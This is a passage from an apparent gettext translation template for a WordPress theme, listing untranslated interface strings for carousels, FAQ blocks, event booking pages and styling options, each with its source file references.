framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:162 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:128 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:42 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:72 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:234 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:200 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:132 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:178 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:70 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:75 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:257 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:97 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:155 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:48 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/vc_options.php:23 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:101 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:129 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:308 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:187 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:125 msgid "Extra Class" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:269 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:70 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:118 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:117 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:119 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:111 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:77 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:57 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:110 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:257 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:86 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:83 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:45 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:135 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:260 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:100 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:158 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:51 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:311 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:190 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:128 msgid "Add extra class to block" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:8 msgid "SLZ Events Carousel" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:9 msgid "Banner of events" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:17 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/button/config.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/config.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:62 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/config.php:21 #: framework-customizations/extensions/teams/shortcodes/team-carousel/config.php:31 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/config.php:20 msgid "Italy" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:18 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/config.php:26 #: framework-customizations/extensions/teams/shortcodes/team-carousel/config.php:32 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/config.php:22 msgid "Turkey" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:40 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:84 #: framework-customizations/extensions/portfolio/views/archive.php:47 #: framework-customizations/extensions/posts/posts/post-01/views/related_item.php:53 #: framework-customizations/extensions/posts/posts/post-02/views/related_item.php:53 #: framework-customizations/extensions/posts/posts/post-03/views/related_item.php:53 #: framework-customizations/extensions/posts/posts/post-04/views/related_item.php:53 #: framework-customizations/extensions/posts/posts/post-05/views/related_item.php:53 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:79 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:88 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/views/large_module.php:68 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/views/medium_module.php:45 #: framework-customizations/extensions/shortcodes/shortcodes/posts-mansory/views/layout-1.php:23 #: framework-customizations/theme/views/article.php:29 msgid "Read More" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-1.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:42 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:3 msgid "London" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-1.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:43 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:4 msgid "Harrogate" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-1.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:44 msgid "Leeds" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-1.php:17 #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-3.php:15 msgid "Select style for event block." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-3.php:6 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-6.php:3 msgid "Istanbul" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:50 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-2.php:22 msgid "Title Block" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:53 msgid "Add title for shortcode block." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:58 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:88 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:108 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:100 msgid "Limit Post" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:61 msgid "Limit post display. Default: -1" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:82 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:86 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:180 msgid "Button \"Read More\" Text" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:89 msgid "Enter text for button \"Read More\"" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:99 msgid "Choose event category or special events to display." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:113 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:153 msgid "Choose special category to filter." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:135 msgid "Choose special event to show." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:152 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:60 msgid "Is Auto Play?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:154 msgid "Choose YES to slide auto play. Default: Yes" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:157 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:167 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:177 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:187 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:196 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:205 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:129 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:142 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:151 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:160 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:169 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:93 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:106 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:119 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:132 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:144 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:166 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:182 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:198 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:214 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:230 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:243 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:178 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:187 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:196 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:205 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:213 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:221 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:266 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:275 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:284 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:293 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:302 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:310 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:299 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:312 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:322 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:331 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:340 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:348 msgid "Slide Custom" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:162 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:68 msgid "Is Dots Navigation?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:163 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:197 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:70 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:72 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:355 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:283 msgid "Choose YES to show dot navigation." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:172 msgid "Is Arrows Navigation?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:176 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:213 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:78 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:85 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:368 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:292 msgid "Choose YES to show arrow navigation." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:182 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:164 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:123 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:222 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:84 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:94 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:200 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:297 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:335 msgid "Is Loop Infinite ?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:186 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:168 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:127 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:229 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:86 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:98 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:204 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:381 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:301 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:339 msgid "Choose YES to slide loop infinite." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:192 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:124 #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:124 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:161 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:266 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:53 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:90 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:326 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:261 msgid "Slide To Show" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:195 msgid "Enter number of items to show. Default: 1" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:201 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:136 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:238 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:107 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:209 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:390 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:306 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:344 msgid "Speed Slide" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:204 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:139 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:242 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:110 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:212 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:393 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:309 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:347 msgid "Enter number value. Unit is millisecond. Example: 600." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:305 msgid "Show Countdown?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:313 msgid "Choose show or hide event countdown." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:332 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:61 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:74 msgid "Add extra class to block shortcode." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:26 #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:35 #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:44 #: framework-customizations/extensions/events/shortcodes/event-carousel/views/layout-2.php:53 msgid "00" msgstr "" #: framework-customizations/extensions/events/views/single.php:50 msgid "Last updated:" msgstr "" #: framework-customizations/extensions/events/views/single.php:79 msgid "Location" msgstr "" #: framework-customizations/extensions/events/views/single.php:144 #: framework-customizations/extensions/events/views/single.php:151 msgid "FREE" msgstr "" #: framework-customizations/extensions/events/views/single.php:161 msgid "/slot" msgstr "" #: framework-customizations/extensions/events/views/single.php:166 msgid "Booked time" msgstr "" #: framework-customizations/extensions/events/views/single.php:171 msgid "Booked slot" msgstr "" #: framework-customizations/extensions/events/views/single.php:172 msgid "Unlimited" msgstr "" #: framework-customizations/extensions/events/views/single.php:177 msgid "Quantity" msgstr "" #: framework-customizations/extensions/events/views/single.php:181 #: setup/data-master/views/import_attachments.php:18 msgid "Total" msgstr "" #: framework-customizations/extensions/events/views/single.php:184 msgid "BOOK TICKET NOW" msgstr "" #: framework-customizations/extensions/events/views/single.php:207 msgid "You might also like..." msgstr "" #: framework-customizations/extensions/events/views/single.php:259 msgid "Quantity:" msgstr "" #: framework-customizations/extensions/events/views/single.php:260 msgid "Total:" msgstr "" #: framework-customizations/extensions/events/views/single.php:274 #: framework-customizations/theme/options/speed-optimize.php:115 msgid "Checkout" msgstr "" #: framework-customizations/extensions/events/views/single.php:298 msgid "Payment Successful!" msgstr "" #: framework-customizations/extensions/events/views/single.php:299 msgid "Please check your mail box to receive invoice." msgstr "" #: framework-customizations/extensions/events/views/single.php:305 msgid "Payment Fail!" msgstr "" #: framework-customizations/extensions/events/views/single.php:306 msgid "Please try again." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/config.php:10 msgid "SLZ FAQ Block" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/config.php:11 msgid "Show list of FAQ." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:11 #: framework-customizations/extensions/lema/shortcodes/course-collection/class-slz-shortcode-course-collection.php:207 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:39 msgid "- All Categories -" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:23 msgid "Choose category to show." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:27 msgid "Display Title" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:31 msgid "Choose to show category title." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:35 msgid "Display Readmore" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:39 msgid "Choose to show readmore buton." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:47 msgid "Choose to show pagination." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:77 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:85 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:93 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:101 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:109 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:117 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:125 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:133 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:181 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:193 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:205 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:217 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:229 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:241 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:288 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:32 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:40 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:48 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:56 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:22 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:30 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:80 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:88 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:96 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:104 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:112 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:120 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:105 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:113 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:121 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:129 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:137 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:198 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:206 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:214 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:222 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:230 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:238 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:246 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:254 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:322 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:334 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:346 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:358 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:370 #: framework-customizations/theme/options/page-header-settings.php:151 #: framework-customizations/theme/options/page-header-settings.php:223 #: framework-customizations/theme/options/page-options.php:40 #: framework-customizations/theme/options/post-settings.php:393 #: framework-customizations/theme/options/posts/page.php:146 #: framework-customizations/theme/options/posts/slz-faq.php:96 #: framework-customizations/theme/options/template-settings.php:566 #: framework-customizations/theme/options/typography.php:35 #: framework-customizations/theme/options/typography.php:64 #: framework-customizations/theme/options/typography.php:142 msgid "Custom" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:82 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:202 msgid "Title Color Hover" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:84 msgid "Choose a custom color hover for title." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:90 msgid "Item Color" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:92 msgid "Choose a custom color for item." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:98 msgid "Item Color Hover" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:100 msgid "Choose a custom color hover for item." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:106 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:44 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:176 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:204 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:110 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:206 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:312 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:31 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:104 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:161 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:240 msgid "Icon Color" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:108 msgid "Choose a custom color for icon." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:114 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:118 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:321 msgid "Icon Color Hover" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:116 msgid "Choose a custom color hover for icon." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:122 msgid "Read More Color" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:124 msgid "Choose a custom color for read more button." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:130 msgid "Read More Color Hover" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:132 msgid "Choose a custom color hover for read more button." msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/views/view.php:31 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:49 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:43 msgid "All Categories" msgstr "" #: framework-customizations/extensions/faq/shortcodes/faq-block/views/view.php:78 msgid "SEE ALL ARTICLES" msgstr "" #: framework-customizations/extensions/faq/views/single.php:17 msgid "Updated" msgstr "" #: framework-customizations/extensions/faq/views/single.php:17 msgid "ago" msgstr "" #: framework-customizations/extensions/faq/views/single.php:47 #: framework-customizations/extensions/posts/posts/post-01/views/view.php:97 #: framework-customizations/extensions/posts/posts/post-02/views/view.php:91 #: framework-customizations/extensions/posts/posts/post-03/views/view.php:96 #: framework-customizations/extensions/posts/posts/post-04/views/view.php:95 #: framework-customizations/extensions/posts/posts/post-05/views/view.php:86 #: framework-customizations/theme/options/post-settings.php:167 msgid "Related Articles" msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/config.php:7 msgid "faq-category" msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/config.php:8 msgid "SLZ: FAQ Categories" msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/config.php:9 msgid "A list of FAQ categories." msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/config.php:13 msgid "FAQ Categories" msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/views/admin.php:18 #: framework-customizations/extensions/headers/headers/header-09/options/button.php:31 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:68 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:154 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:61 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:19 #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:9 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:91 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:34 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:94 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:37 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:116 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:78 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:36 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:27 #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:19 #: framework-customizations/extensions/widgets/widgets/partner/options.php:18 #: framework-customizations/extensions/widgets/widgets/recent-post/views/admin.php:7 #: framework-customizations/theme/options/page-404-settings.php:67 #: framework-customizations/theme/options/post-settings.php:237 msgid "Title" msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/views/admin.php:24 #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:32 msgid "Title Color:" msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/views/admin.php:33 #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:37 msgid "Optional - Choose a custom title text color for this block" msgstr "" #: framework-customizations/extensions/faq/widgets/faq-category/views/admin.php:36 msgid "FAQ Category:" msgstr "" #: 